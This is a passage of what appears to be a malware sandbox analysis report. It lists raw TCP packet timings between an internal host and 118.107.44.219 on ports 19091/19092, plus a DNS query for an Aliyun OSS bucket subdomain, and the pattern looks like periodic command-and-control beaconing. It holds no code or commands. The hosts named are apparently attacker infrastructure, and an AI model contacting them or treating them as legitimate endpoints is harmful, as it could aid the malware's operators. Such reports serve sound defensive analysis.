                                                                                                                          Jan 4, 2025 05:38:52.636415958 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.636478901 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.636503935 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.637146950 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.637195110 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.637200117 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.637212038 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.637238026 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.637247086 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.637264967 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.637307882 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.637310982 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.637322903 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.637334108 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.637365103 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.638062000 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.638108015 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.638113022 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.638120890 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.638148069 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.638175964 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.638186932 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.638199091 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.638211966 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.638225079 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.638259888 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.638850927 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.638870955 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.638881922 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.638909101 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.638920069 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.638958931 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.638998032 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.639009953 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.639024019 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.639058113 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.724384069 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.769916058 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.855439901 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.855463028 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.855473042 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.855489969 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.855500937 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.855510950 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.855521917 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.855524063 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.855531931 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.855596066 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.855619907 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.855732918 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.855788946 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.855799913 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.855834961 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.855878115 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.855886936 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.855912924 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.855922937 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.855925083 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.855957985 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.856302977 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.856312990 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.856323004 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.856345892 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.856358051 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.856367111 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.856380939 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.856384993 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.856391907 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.856421947 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.856442928 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.856457949 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.856468916 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.856482029 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.856489897 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.856528044 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.857250929 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.857260942 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.857270956 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.857280970 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.857290030 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.857300043 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.857310057 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.857311010 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.857321024 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.857330084 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.857359886 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.857647896 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.857660055 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.857669115 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.857688904 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.857698917 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.857702017 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.857708931 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.857719898 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.857745886 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.857779980 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.857822895 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.857877970 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.858190060 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.858201027 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.858211040 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.858243942 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.858274937 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.858284950 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.858294964 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.858309031 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.858314037 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.858347893 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.858372927 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.858381987 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.858417988 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.858781099 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.858809948 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.858822107 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.860383987 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.860394001 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.860404015 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.860440016 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.860467911 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.860475063 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.860486031 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.860496044 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.860522985 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.860526085 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.860536098 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.860577106 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.860615969 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.860626936 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.860641003 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.860651970 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.860661983 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.860671997 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.860697985 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.860721111 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.860728025 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.860738039 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.860790014 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:53.074538946 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.074553013 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.074563980 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.074587107 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.074598074 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.074608088 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.074620962 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:53.074632883 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.074671030 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:53.074688911 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.074700117 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.074742079 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:53.074781895 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.074791908 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.074804068 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.074809074 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.074820042 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.074831009 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.074837923 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:53.074857950 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.074875116 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.074875116 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:53.074884892 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.074909925 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:53.074938059 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:53.074944973 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.074964046 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.074975014 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.075007915 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:53.075109005 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.075120926 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.075130939 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.075143099 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.075154066 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.075165033 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.075167894 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:53.075201035 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:53.075218916 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.075228930 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.075239897 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.075249910 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.075270891 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:53.075305939 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:53.075335979 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.075346947 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.075359106 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.075368881 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.075378895 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.075392008 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:53.075409889 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:53.075428009 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:53.075587988 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.075680017 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.077100992 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:54.145410061 CET4974419091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:54.151222944 CET1909149744118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:54.151411057 CET4974419091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:56.113771915 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:39:01.889216900 CET4974419091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:39:01.895068884 CET1909149744118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:39:01.895083904 CET1909149744118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:39:01.895091057 CET1909149744118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:39:01.895093918 CET1909149744118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:39:02.196643114 CET1909149744118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:39:02.197098970 CET4974419091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:39:02.201895952 CET1909149744118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:39:11.754668951 CET4974419091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:39:11.759691954 CET1909149744118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:39:12.055356026 CET1909149744118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:39:12.098088026 CET4974419091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:39:12.193875074 CET4974419091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:39:12.198757887 CET1909149744118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:39:28.692047119 CET4974419091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:39:28.696872950 CET1909149744118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:39:28.992362022 CET1909149744118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:39:29.035569906 CET4974419091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:39:29.102564096 CET4974419091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:39:29.107343912 CET1909149744118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:39:45.535711050 CET4974419091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:39:45.540602922 CET1909149744118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:39:45.836827993 CET1909149744118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:39:45.879368067 CET4974419091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:39:45.907618046 CET4974419091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:39:45.912622929 CET1909149744118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:40:01.363847017 CET4974419091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:40:01.368782043 CET1909149744118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:40:01.664582968 CET1909149744118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:40:01.708920002 CET4974419091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:40:01.775121927 CET4974419091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:40:01.780056000 CET1909149744118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:40:18.708384991 CET4974419091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:40:18.708519936 CET4974419091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:40:18.713289976 CET1909149744118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:40:18.713335037 CET4974419091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:40:20.762639999 CET5001119092192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:40:20.767575026 CET1909250011118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:40:20.767647982 CET5001119092192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:40:27.916318893 CET5001119092192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:40:27.921258926 CET1909250011118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:40:27.921273947 CET1909250011118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:40:27.921284914 CET1909250011118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:40:27.921612024 CET1909250011118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:40:29.475598097 CET1909250011118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:40:29.475960016 CET1909250011118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:40:29.476021051 CET5001119092192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:40:29.476058006 CET1909250011118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:40:29.476093054 CET5001119092192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:40:29.476263046 CET5001119092192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:40:29.476268053 CET1909250011118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:40:29.476309061 CET5001119092192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:40:29.480995893 CET1909250011118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:40:37.832833052 CET5001119092192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:40:37.837742090 CET1909250011118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:40:38.142919064 CET1909250011118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:40:38.244081020 CET5001119092192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:40:38.248965025 CET1909250011118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:40:54.004759073 CET5001119092192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:40:54.004759073 CET5001119092192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:40:54.009588957 CET1909250011118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:40:54.010853052 CET5001119092192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:40:55.942588091 CET5001219091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:40:55.947572947 CET1909150012118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:40:55.950865984 CET5001219091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:41:05.135756016 CET5001219091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:41:05.140767097 CET1909150012118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:41:05.140779018 CET1909150012118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:41:05.140788078 CET1909150012118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:41:05.140796900 CET1909150012118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:41:05.443392038 CET1909150012118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:41:05.444765091 CET5001219091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:41:05.449609041 CET1909150012118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:41:12.692260027 CET5001219091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:41:12.697096109 CET1909150012118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:41:12.994446039 CET1909150012118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:41:13.035805941 CET5001219091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:41:13.350052118 CET5001219091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:41:13.354834080 CET1909150012118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:41:29.489126921 CET5001219091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:41:29.494033098 CET1909150012118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:41:29.791357040 CET1909150012118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:41:29.848331928 CET5001219091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:41:29.925323009 CET5001219091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:41:29.930223942 CET1909150012118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:41:45.801683903 CET5001219091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:41:45.806504011 CET1909150012118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:41:46.103729963 CET1909150012118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:41:46.145251036 CET5001219091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:41:46.376764059 CET5001219091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:41:46.381616116 CET1909150012118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:42:01.864039898 CET5001219091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:42:01.868766069 CET1909150012118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:42:02.166332006 CET1909150012118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:42:02.207773924 CET5001219091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:42:02.263411999 CET5001219091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:42:02.268280029 CET1909150012118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:42:18.020380974 CET5001219091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:42:18.025290012 CET1909150012118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:42:18.322670937 CET1909150012118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:42:18.364052057 CET5001219091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:42:18.410784006 CET5001219091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:42:18.415663004 CET1909150012118.107.44.219192.168.2.4

                                                                                                                          UDP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Jan 4, 2025 05:38:21.068672895 CET6392753192.168.2.41.1.1.1
                                                                                                                          Jan 4, 2025 05:38:21.259260893 CET53639271.1.1.1192.168.2.4

                                                                                                                          DNS Queries

                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Jan 4, 2025 05:38:21.068672895 CET192.168.2.41.1.1.10x283bStandard query (0)bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.comA (IP address)IN (0x0001)false

                                                                                                                          DNS Answers

                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
